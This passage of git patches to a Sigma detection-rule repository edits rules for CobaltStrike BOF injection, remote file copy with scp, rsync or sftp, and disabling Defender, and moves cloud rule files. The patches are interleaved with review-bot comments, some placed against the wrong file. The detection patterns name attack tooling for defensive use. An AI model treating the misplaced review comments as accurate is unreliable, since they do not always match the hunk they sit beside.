 - https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/
 author: Florian Roth, wagga
 date: 2020/02/29
-modified: 2021/08/09
+modified: 2021/06/27
 tags:
 - attack.initial_access
 - attack.t1190
@@ -20,7 +20,8 @@ detection:
 Source: MSExchange Control Panel
 Level: Error
 selection2:
- Message|contains: '&__VIEWSTATE='
+ Message|contains:
+ - '&__VIEWSTATE='
 condition: selection1 and selection2
 falsepositives:
 - Unknown
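Review bot: `modified:` is rolled back to `2020/08/23` in win_alert_active_directory_user_control.yml and to `2021/06/27` in win_vul_cve_2020_0688.yml, and removed outright from win_alert_enable_weak_encryption.yml, while the same commit rewrites the detection blocks of all three files; consumers that re-ingest rules by a newer `modified` date will not pick these versions up. If the intent is to restore the exact pre-2021/08/09 state of each rule, the commit body should say so explicitly; otherwise `modified:` should carry the date of this change. Dropping the field entirely in the second file also loses the only signal that the rule was ever revised after `date: 2017/07/30`.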
From 246ba0c17f631153a5f53490fde208d07dc935cb Mon Sep 17 00:00:00 2001
From: phantinuss
Date: Fri, 13 Aug 2021 15:31:12 +0200
Subject: [PATCH 0322/1367] generalise amsi bypass rule to CobaltStrike BOF injection pattern generalise to CobaltStrike BOF injection pattern
---
 ...yml => sysmon_cobaltstrike_bof_injection_pattern.yml} | 9 ++++++---
 1 file changed, 6 insertions(+), 3 deletions(-)
 rename rules/windows/process_access/{sysmon_injected_amsi_bypass.yml => sysmon_cobaltstrike_bof_injection_pattern.yml} (70%)
diff --git a/rules/windows/process_access/sysmon_injected_amsi_bypass.yml b/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml
similarity index 70%
rename from rules/windows/process_access/sysmon_injected_amsi_bypass.yml
rename to rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml
index d8e898ae..424ca2bc 100644
--- a/rules/windows/process_access/sysmon_injected_amsi_bypass.yml
+++ b/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml
@@ -1,8 +1,9 @@
-title: CobaltStrike BOF Injecting AMSI Bypass
+title: CobaltStrike BOF Injection Pattern
 id: 09706624-b7f6-455d-9d02-adee024cee1d
-description: Detects the usage of a CobaltStrike BOF which injects an AMSI Bypass
+description: Detects a typical pattern of a CobaltStrike BOF which inject into other processes
 references:
 - https://github.com/boku7/injectAmsiBypass
+ - https://github.com/boku7/spawn
 status: experimental
 author: Christian Burkard
 date: 2021/08/04
@@ -12,7 +13,9 @@ logsource:
 detection:
 selection:
 CallTrace|re: '^C:\\Windows\\SYSTEM32\\ntdll\.dll\+[a-z0-9]{4,6}\|C:\\Windows\\System32\\KERNELBASE\.dll\+[a-z0-9]{4,6}\|UNKNOWN\([A-Z0-9]{16}\)$'
- GrantedAccess: '0x1028'
+ GrantedAccess:
+ - '0x1028'
+ - '0x1fffff'
 condition: selection
 falsepositives:
 - unkown
From c0aa9696ddb1ef6b3a821b931a16ed51c0fde603 Mon Sep 17 00:00:00 2001
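Review bot: The new `description` line has a grammar slip (`which inject into other processes`); it should read `description: Detects a typical pattern of a CobaltStrike BOF which injects into other processes`. Adding `'0x1fffff'` (PROCESS_ALL_ACCESS) to `GrantedAccess` widens the rule noticeably, since full-access handles are routinely opened by debuggers, backup agents and security tooling, so the anchored `CallTrace` regex is now the only discriminator; the `falsepositives` entry still reads only `unkown` and should name those tool classes so the widening is documented (and the typo fixed while the file is being renamed). The visible context shows `date: 2021/08/04` but no `modified:` line; if the file has none, one dated to this change is expected for a change in detection logic.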
From: frack113 Date: Fri, 13 Aug 2021 15:40:03 +0200 Subject: [PATCH 0323/1367] move aws rules --- rules/cloud/{ => aws}/aws_cloudtrail_disable_logging.yml | 0 rules/cloud/{ => aws}/aws_config_disable_recording.yml | 0 rules/cloud/{ => aws}/aws_ec2_disable_encryption.yml | 0 rules/cloud/{ => aws}/aws_ec2_download_userdata.yml | 0 rules/cloud/{ => aws}/aws_ec2_startup_script_change.yml | 0 rules/cloud/{ => aws}/aws_ec2_vm_export_failure.yml | 0 rules/cloud/{ => aws}/aws_elasticache_security_group_created.yml | 0 .../aws_elasticache_security_group_modified_or_deleted.yml | 0 rules/cloud/{ => aws}/aws_enum_listing.yml | 0 rules/cloud/{ => aws}/aws_guardduty_disruption.yml | 0 rules/cloud/{ => aws}/aws_iam_backdoor_users_keys.yml | 0 rules/cloud/{ => aws}/aws_macic_evasion.yml | 0 rules/cloud/{ => aws}/aws_rds_change_master_password.yml | 0 rules/cloud/{ => aws}/aws_rds_public_db_restore.yml | 0 rules/cloud/{ => aws}/aws_root_account_usage.yml | 0 .../{ => aws}/aws_route_53_domain_transferred_lock_disabled.yml | 0 .../aws_route_53_domain_transferred_to_another_account.yml | 0 rules/cloud/{ => aws}/aws_s3_data_management_tampering.yml | 0 rules/cloud/{ => aws}/aws_securityhub_finding_evasion.yml | 0 rules/cloud/{ => aws}/aws_snapshot_backup_exfiltration.yml | 0 rules/cloud/{ => aws}/aws_sts_assumedrole_misuse.yml | 0 rules/cloud/{ => aws}/aws_sts_getsessiontoken_misuse.yml | 0 rules/cloud/{ => aws}/aws_update_login_profile.yml | 0 23 files changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/{ => aws}/aws_cloudtrail_disable_logging.yml (100%) rename rules/cloud/{ => aws}/aws_config_disable_recording.yml (100%) rename rules/cloud/{ => aws}/aws_ec2_disable_encryption.yml (100%) rename rules/cloud/{ => aws}/aws_ec2_download_userdata.yml (100%) rename rules/cloud/{ => aws}/aws_ec2_startup_script_change.yml (100%) rename rules/cloud/{ => aws}/aws_ec2_vm_export_failure.yml (100%) rename rules/cloud/{ => aws}/aws_elasticache_security_group_created.yml (100%) rename 
rules/cloud/{ => aws}/aws_elasticache_security_group_modified_or_deleted.yml (100%) rename rules/cloud/{ => aws}/aws_enum_listing.yml (100%) rename rules/cloud/{ => aws}/aws_guardduty_disruption.yml (100%) rename rules/cloud/{ => aws}/aws_iam_backdoor_users_keys.yml (100%) rename rules/cloud/{ => aws}/aws_macic_evasion.yml (100%) rename rules/cloud/{ => aws}/aws_rds_change_master_password.yml (100%) rename rules/cloud/{ => aws}/aws_rds_public_db_restore.yml (100%) rename rules/cloud/{ => aws}/aws_root_account_usage.yml (100%) rename rules/cloud/{ => aws}/aws_route_53_domain_transferred_lock_disabled.yml (100%) rename rules/cloud/{ => aws}/aws_route_53_domain_transferred_to_another_account.yml (100%) rename rules/cloud/{ => aws}/aws_s3_data_management_tampering.yml (100%) rename rules/cloud/{ => aws}/aws_securityhub_finding_evasion.yml (100%) rename rules/cloud/{ => aws}/aws_snapshot_backup_exfiltration.yml (100%) rename rules/cloud/{ => aws}/aws_sts_assumedrole_misuse.yml (100%) rename rules/cloud/{ => aws}/aws_sts_getsessiontoken_misuse.yml (100%) rename rules/cloud/{ => aws}/aws_update_login_profile.yml (100%) diff --git a/rules/cloud/aws_cloudtrail_disable_logging.yml b/rules/cloud/aws/aws_cloudtrail_disable_logging.yml similarity index 100% rename from rules/cloud/aws_cloudtrail_disable_logging.yml rename to rules/cloud/aws/aws_cloudtrail_disable_logging.yml diff --git a/rules/cloud/aws_config_disable_recording.yml b/rules/cloud/aws/aws_config_disable_recording.yml similarity index 100% rename from rules/cloud/aws_config_disable_recording.yml rename to rules/cloud/aws/aws_config_disable_recording.yml diff --git a/rules/cloud/aws_ec2_disable_encryption.yml b/rules/cloud/aws/aws_ec2_disable_encryption.yml similarity index 100% rename from rules/cloud/aws_ec2_disable_encryption.yml rename to rules/cloud/aws/aws_ec2_disable_encryption.yml 
diff --git a/rules/cloud/aws_ec2_download_userdata.yml b/rules/cloud/aws/aws_ec2_download_userdata.yml similarity index 100% rename from rules/cloud/aws_ec2_download_userdata.yml rename to rules/cloud/aws/aws_ec2_download_userdata.yml diff --git a/rules/cloud/aws_ec2_startup_script_change.yml b/rules/cloud/aws/aws_ec2_startup_script_change.yml similarity index 100% rename from rules/cloud/aws_ec2_startup_script_change.yml rename to rules/cloud/aws/aws_ec2_startup_script_change.yml diff --git a/rules/cloud/aws_ec2_vm_export_failure.yml b/rules/cloud/aws/aws_ec2_vm_export_failure.yml similarity index 100% rename from rules/cloud/aws_ec2_vm_export_failure.yml rename to rules/cloud/aws/aws_ec2_vm_export_failure.yml diff --git a/rules/cloud/aws_elasticache_security_group_created.yml b/rules/cloud/aws/aws_elasticache_security_group_created.yml similarity index 100% rename from rules/cloud/aws_elasticache_security_group_created.yml rename to rules/cloud/aws/aws_elasticache_security_group_created.yml diff --git a/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml b/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml similarity index 100% rename from rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml rename to rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml diff --git a/rules/cloud/aws_enum_listing.yml b/rules/cloud/aws/aws_enum_listing.yml similarity index 100% rename from rules/cloud/aws_enum_listing.yml rename to rules/cloud/aws/aws_enum_listing.yml diff --git a/rules/cloud/aws_guardduty_disruption.yml b/rules/cloud/aws/aws_guardduty_disruption.yml similarity index 100% rename from rules/cloud/aws_guardduty_disruption.yml rename to rules/cloud/aws/aws_guardduty_disruption.yml 
diff --git a/rules/cloud/aws_iam_backdoor_users_keys.yml b/rules/cloud/aws/aws_iam_backdoor_users_keys.yml similarity index 100% rename from rules/cloud/aws_iam_backdoor_users_keys.yml rename to rules/cloud/aws/aws_iam_backdoor_users_keys.yml diff --git a/rules/cloud/aws_macic_evasion.yml b/rules/cloud/aws/aws_macic_evasion.yml similarity index 100% rename from rules/cloud/aws_macic_evasion.yml rename to rules/cloud/aws/aws_macic_evasion.yml diff --git a/rules/cloud/aws_rds_change_master_password.yml b/rules/cloud/aws/aws_rds_change_master_password.yml similarity index 100% rename from rules/cloud/aws_rds_change_master_password.yml rename to rules/cloud/aws/aws_rds_change_master_password.yml diff --git a/rules/cloud/aws_rds_public_db_restore.yml b/rules/cloud/aws/aws_rds_public_db_restore.yml similarity index 100% rename from rules/cloud/aws_rds_public_db_restore.yml rename to rules/cloud/aws/aws_rds_public_db_restore.yml diff --git a/rules/cloud/aws_root_account_usage.yml b/rules/cloud/aws/aws_root_account_usage.yml similarity index 100% rename from rules/cloud/aws_root_account_usage.yml rename to rules/cloud/aws/aws_root_account_usage.yml diff --git a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml similarity index 100% rename from rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml rename to rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml diff --git a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml similarity index 100% rename from rules/cloud/aws_route_53_domain_transferred_to_another_account.yml rename to rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml 
diff --git a/rules/cloud/aws_s3_data_management_tampering.yml b/rules/cloud/aws/aws_s3_data_management_tampering.yml similarity index 100% rename from rules/cloud/aws_s3_data_management_tampering.yml rename to rules/cloud/aws/aws_s3_data_management_tampering.yml diff --git a/rules/cloud/aws_securityhub_finding_evasion.yml b/rules/cloud/aws/aws_securityhub_finding_evasion.yml similarity index 100% rename from rules/cloud/aws_securityhub_finding_evasion.yml rename to rules/cloud/aws/aws_securityhub_finding_evasion.yml diff --git a/rules/cloud/aws_snapshot_backup_exfiltration.yml b/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml similarity index 100% rename from rules/cloud/aws_snapshot_backup_exfiltration.yml rename to rules/cloud/aws/aws_snapshot_backup_exfiltration.yml diff --git a/rules/cloud/aws_sts_assumedrole_misuse.yml b/rules/cloud/aws/aws_sts_assumedrole_misuse.yml similarity index 100% rename from rules/cloud/aws_sts_assumedrole_misuse.yml rename to rules/cloud/aws/aws_sts_assumedrole_misuse.yml diff --git a/rules/cloud/aws_sts_getsessiontoken_misuse.yml b/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml similarity index 100% rename from rules/cloud/aws_sts_getsessiontoken_misuse.yml rename to rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml diff --git a/rules/cloud/aws_update_login_profile.yml b/rules/cloud/aws/aws_update_login_profile.yml similarity index 100% rename from rules/cloud/aws_update_login_profile.yml rename to rules/cloud/aws/aws_update_login_profile.yml From 1a1221d71ce7ebe5838ad3ff19f4e339c79a8fdc Mon Sep 17 00:00:00 2001 
From: frack113 Date: Fri, 13 Aug 2021 15:42:54 +0200 Subject: [PATCH 0324/1367] move azure rules --- .../{ => azure}/azure_container_registry_created_or_deleted.yml | 0 rules/cloud/{ => azure}/azure_dns_zone_modified_or_deleted.yml | 0 rules/cloud/{ => azure}/azure_firewall_modified_or_deleted.yml | 0 .../azure_firewall_rule_collection_modified_or_deleted.yml | 0 .../{ => azure}/azure_kubernetes_cluster_created_or_deleted.yml | 0 rules/cloud/{ => azure}/azure_kubernetes_events_deleted.yml | 0 .../cloud/{ => azure}/azure_kubernetes_network_policy_change.yml | 0 rules/cloud/{ => azure}/azure_kubernetes_pods_deleted.yml | 0 rules/cloud/{ => azure}/azure_kubernetes_role_access.yml | 0 .../azure_kubernetes_rolebinding_modified_or_deleted.yml | 0 .../azure_kubernetes_secret_or_config_object_access.yml | 0 .../azure_kubernetes_service_account_modified_or_deleted.yml | 0 .../azure_network_firewall_rule_modified_or_deleted.yml | 0 .../{ => azure}/azure_network_p2s_vpn_modified_or_deleted.yml | 0 .../{ => azure}/azure_network_security_modified_or_deleted.yml | 0 .../azure_network_virtual_device_modified_or_deleted.yml | 0 .../{ => azure}/azure_virtual_network_modified_or_deleted.yml | 0 .../{ => azure}/azure_vpn_connection_modified_or_deleted.yml | 0 18 files changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/{ => azure}/azure_container_registry_created_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_dns_zone_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_firewall_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_firewall_rule_collection_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_kubernetes_cluster_created_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_kubernetes_events_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_kubernetes_network_policy_change.yml (100%) rename rules/cloud/{ => azure}/azure_kubernetes_pods_deleted.yml (100%) rename rules/cloud/{ => 
azure}/azure_kubernetes_role_access.yml (100%) rename rules/cloud/{ => azure}/azure_kubernetes_rolebinding_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_kubernetes_secret_or_config_object_access.yml (100%) rename rules/cloud/{ => azure}/azure_kubernetes_service_account_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_network_firewall_rule_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_network_p2s_vpn_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_network_security_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_network_virtual_device_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_virtual_network_modified_or_deleted.yml (100%) rename rules/cloud/{ => azure}/azure_vpn_connection_modified_or_deleted.yml (100%) diff --git a/rules/cloud/azure_container_registry_created_or_deleted.yml b/rules/cloud/azure/azure_container_registry_created_or_deleted.yml similarity index 100% rename from rules/cloud/azure_container_registry_created_or_deleted.yml rename to rules/cloud/azure/azure_container_registry_created_or_deleted.yml diff --git a/rules/cloud/azure_dns_zone_modified_or_deleted.yml b/rules/cloud/azure/azure_dns_zone_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_dns_zone_modified_or_deleted.yml rename to rules/cloud/azure/azure_dns_zone_modified_or_deleted.yml diff --git a/rules/cloud/azure_firewall_modified_or_deleted.yml b/rules/cloud/azure/azure_firewall_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_firewall_modified_or_deleted.yml rename to rules/cloud/azure/azure_firewall_modified_or_deleted.yml 
diff --git a/rules/cloud/azure_firewall_rule_collection_modified_or_deleted.yml b/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_firewall_rule_collection_modified_or_deleted.yml rename to rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml diff --git a/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml b/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml similarity index 100% rename from rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml rename to rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml diff --git a/rules/cloud/azure_kubernetes_events_deleted.yml b/rules/cloud/azure/azure_kubernetes_events_deleted.yml similarity index 100% rename from rules/cloud/azure_kubernetes_events_deleted.yml rename to rules/cloud/azure/azure_kubernetes_events_deleted.yml diff --git a/rules/cloud/azure_kubernetes_network_policy_change.yml b/rules/cloud/azure/azure_kubernetes_network_policy_change.yml similarity index 100% rename from rules/cloud/azure_kubernetes_network_policy_change.yml rename to rules/cloud/azure/azure_kubernetes_network_policy_change.yml diff --git a/rules/cloud/azure_kubernetes_pods_deleted.yml b/rules/cloud/azure/azure_kubernetes_pods_deleted.yml similarity index 100% rename from rules/cloud/azure_kubernetes_pods_deleted.yml rename to rules/cloud/azure/azure_kubernetes_pods_deleted.yml diff --git a/rules/cloud/azure_kubernetes_role_access.yml b/rules/cloud/azure/azure_kubernetes_role_access.yml similarity index 100% rename from rules/cloud/azure_kubernetes_role_access.yml rename to rules/cloud/azure/azure_kubernetes_role_access.yml 
diff --git a/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml b/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml rename to rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml diff --git a/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml b/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml similarity index 100% rename from rules/cloud/azure_kubernetes_secret_or_config_object_access.yml rename to rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml diff --git a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml b/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml rename to rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml diff --git a/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml b/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml rename to rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml diff --git a/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml b/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml rename to rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml diff --git a/rules/cloud/azure_network_security_modified_or_deleted.yml b/rules/cloud/azure/azure_network_security_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_network_security_modified_or_deleted.yml rename to rules/cloud/azure/azure_network_security_modified_or_deleted.yml 
diff --git a/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml b/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_network_virtual_device_modified_or_deleted.yml rename to rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml diff --git a/rules/cloud/azure_virtual_network_modified_or_deleted.yml b/rules/cloud/azure/azure_virtual_network_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_virtual_network_modified_or_deleted.yml rename to rules/cloud/azure/azure_virtual_network_modified_or_deleted.yml diff --git a/rules/cloud/azure_vpn_connection_modified_or_deleted.yml b/rules/cloud/azure/azure_vpn_connection_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure_vpn_connection_modified_or_deleted.yml rename to rules/cloud/azure/azure_vpn_connection_modified_or_deleted.yml From 4c59ee83d591fc7cf5b97749713d9973e070b471 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 13 Aug 2021 15:43:46 +0200 Subject: [PATCH 0325/1367] move gcp rules --- rules/cloud/{ => gcp}/gcp_kubernetes_rolebinding.yml | 0 .../{ => gcp}/gcp_kubernetes_secrets_modified_or_deleted.yml | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/{ => gcp}/gcp_kubernetes_rolebinding.yml (100%) rename rules/cloud/{ => gcp}/gcp_kubernetes_secrets_modified_or_deleted.yml (100%) diff --git a/rules/cloud/gcp_kubernetes_rolebinding.yml b/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml similarity index 100% rename from rules/cloud/gcp_kubernetes_rolebinding.yml rename to rules/cloud/gcp/gcp_kubernetes_rolebinding.yml diff --git a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml b/rules/cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml similarity index 100% rename from rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml rename to rules/cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml 
From 50f02ed957204c6e47730e442ef89247d6eeea18 Mon Sep 17 00:00:00 2001
From: frack113
Date: Fri, 13 Aug 2021 15:45:28 +0200
Subject: [PATCH 0326/1367] move microsoft365 rules
---
 .../cloud/{ => m365}/microsoft365_impossible_travel_activity.yml | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename rules/cloud/{ => m365}/microsoft365_impossible_travel_activity.yml (100%)
diff --git a/rules/cloud/microsoft365_impossible_travel_activity.yml b/rules/cloud/m365/microsoft365_impossible_travel_activity.yml
similarity index 100%
rename from rules/cloud/microsoft365_impossible_travel_activity.yml
rename to rules/cloud/m365/microsoft365_impossible_travel_activity.yml
From ce326cb9030bd533b9d27f508c2a470e1dbfe04e Mon Sep 17 00:00:00 2001
From: Max Altgelt
Date: Fri, 13 Aug 2021 15:46:30 +0200
Subject: [PATCH 0327/1367] fix: Correct broken rules, add documentation
---
 rules/linux/lnx_file_copy.yml | 13 +++++--------
 .../builtin/win_alert_enable_weak_encryption.yml | 5 +++++
 rules/windows/other/win_defender_disabled.yml | 2 +-
 3 files changed, 11 insertions(+), 9 deletions(-)
diff --git a/rules/linux/lnx_file_copy.yml b/rules/linux/lnx_file_copy.yml
index f48851eb..81b77d8f 100644
--- a/rules/linux/lnx_file_copy.yml
+++ b/rules/linux/lnx_file_copy.yml
@@ -9,17 +9,14 @@ references:
 logsource:
 product: linux
 detection:
- keywords:
- - Scp|contains:
- - 'scp'
- - Rsync|contains:
- - 'rsync -r'
- - Sftp|contains:
- - 'sftp'
+ tools:
+ - 'scp '
+ - 'rsync '
+ - 'sftp '
 filter:
 - '@'
 - ':'
- condition: keywords and filter
+ condition: tools and filter
 falsepositives:
 - Legitimate administration activities
 level: low
diff --git a/rules/windows/builtin/win_alert_enable_weak_encryption.yml b/rules/windows/builtin/win_alert_enable_weak_encryption.yml
index 90af9166..b1728cb4 100644
--- a/rules/windows/builtin/win_alert_enable_weak_encryption.yml
+++ b/rules/windows/builtin/win_alert_enable_weak_encryption.yml
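Review bot: `filter` is a bare keyword list of `'@'` and `':'` and the new `condition: tools and filter` uses it positively, so any log line containing a colon — practically every line with a timestamp — satisfies it and the clause adds nothing to `tools`; `filter` is also the conventional name for a negated selection in this ruleset, which makes the positive use misleading. Either drop the clause or, if the logsource can be narrowed to a process-creation category, test `@`/`:` on the same command-line field as the tool name under a name such as `remote_target` so the two conditions actually constrain the same string. The keyword `'scp '` with a trailing space also matches inside longer tokens (a constructed example: `winscp `); if the intent is the command word, a field-anchored `|startswith` would be tighter than a free-text keyword.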
@@ -17,6 +17,11 @@ logsource:
 detection:
 selection:
 EventID: 4738
+ # According to Microsoft, the bit values are listed here: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720
+ # However, that seems to be a simple copy from https://docs.microsoft.com/en-US/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+ # and the actual flags that are used are quite different and, unfortunately, not documented.
+ # https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/ contains a number of EVTX files with relevant events, which can be used to extract
+ # the following values.
 olduac_des: # 0x8000
 OldUacValue|endswith:
 - 8???
diff --git a/rules/windows/other/win_defender_disabled.yml b/rules/windows/other/win_defender_disabled.yml
index 0cd77d6d..0c3281a6 100644
--- a/rules/windows/other/win_defender_disabled.yml
+++ b/rules/windows/other/win_defender_disabled.yml
@@ -54,4 +54,4 @@ detection:
 keywords:
 - 'Windows Defender Antivirus Service'
 - 'stopped'
- condition: selection3 and keywords
\ No newline at end of file
+ condition: selection3 and all of keywords
\ No newline at end of file
From 34bc4c5faa43feaa5fce56371d878fc2646c5aef Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Fri, 13 Aug 2021 16:50:34 -0500
Subject: [PATCH 0328/1367] Create gcp_firewall_rule_modified_or_deleted.yml
---
 .../gcp_firewall_rule_modified_or_deleted.yml | 25 +++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml
diff --git a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml
new file mode 100644
index 00000000..af297543
--- /dev/null
+++ b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml
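Review bot: The rewritten `condition:` line in win_defender_disabled.yml still leaves the file without a trailing newline (`\ No newline at end of file` on both sides of the hunk); since the line is being touched anyway, terminate it so the next diff of this file is not noisy and YAML linters stop flagging it. `all of keywords` is the right fix for requiring both `'Windows Defender Antivirus Service'` and `'stopped'` in the same event, but that intent is not obvious from the bare list, so a one-line comment above `keywords:` such as `# both strings must appear in the same event (see condition)` would save the next reader a lookup.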
@@ -0,0 +1,25 @@
+title: Google Cloud Firewall Modified or Deleted
+id: fe513c69-734c-4d4a-8548-ac5f609be82b
+description: Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP). An adversary may modify a firewall rule in order to weaken their target's security controls.
+author: Austin Songer
+status: experimental
+date: 2021/08/13
+references:
+ - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging
+ - https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html
+logsource:
+ service: gcp.audit
+detection:
+ selection:
+ gcp.audit.method_name:
+ - v*.compute.firewalls.delete
+ - v*.compute.firewalls.patch
+ - v*.compute.firewalls.update
+ condition: selection
+level: medium
+tags:
+ - attack.defense.evasion
+ - attack.t1562
+falsepositives:
+ - Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.
+ - Exceptions can be added to this rule to filter expected behavior.
From 7479dcd15d7852100c228d31acf80c59f06cb099 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Fri, 13 Aug 2021 16:51:58 -0500
Subject: [PATCH 0329/1367] Update gcp_firewall_rule_modified_or_deleted.yml
---
 rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml
index af297543..5d4099fb 100644
--- a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml
+++ b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml
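Review bot: The `v*.` prefix on `gcp.audit.method_name` only matches versioned API paths such as `v1.compute.firewalls.delete`; to my knowledge GCP records calls made through the beta surface with a `beta.` prefix (for example `beta.compute.firewalls.patch`), which this selection would miss, so a leading `*.compute.firewalls.delete` form is the safer wildcard if the backend tolerates a leading wildcard. The first reference points at GKE audit logging, which is unrelated to Compute firewall rules; the Compute `Firewalls` API reference already listed is the relevant one and the GKE link should be dropped or replaced with the Compute audit-logging page. `falsepositives` is reasonable, but `description` could state the defensive angle in one clause so triage knows what to look for, e.g. `... Review the change for removed deny rules or widened source ranges.`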
@@ -1,6 +1,6 @@ title: Google Cloud Firewall Modified or Deleted id: fe513c69-734c-4d4a-8548-ac5f609be82b -description: Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP). An adversary may modify a firewall rule in order to weaken their target's security controls. +description: Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP). author: Austin Songer status: experimental date: 2021/08/13 From a973c6c4455bcf01176528afe0c3e3398efb4f56 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 13 Aug 2021 17:07:18 -0500 Subject: [PATCH 0330/1367] Create gcp_full_network_traffic_packet_capture.yml --- ...cp_full_network_traffic_packet_capture.yml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml diff --git a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml new file mode 100644 index 00000000..3d6bbd22 --- /dev/null +++ b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml 
@@ -0,0 +1,26 @@
+title: Google Full Network Traffic Packet Capture
+id: 980a7598-1e7f-4962-9372-2d754c930d0e
+description: Identifies potential full network packet capture in AWS. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.
+author: Austin Songer
+status: experimental
+date: 2021/08/13
+references:
+ - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging
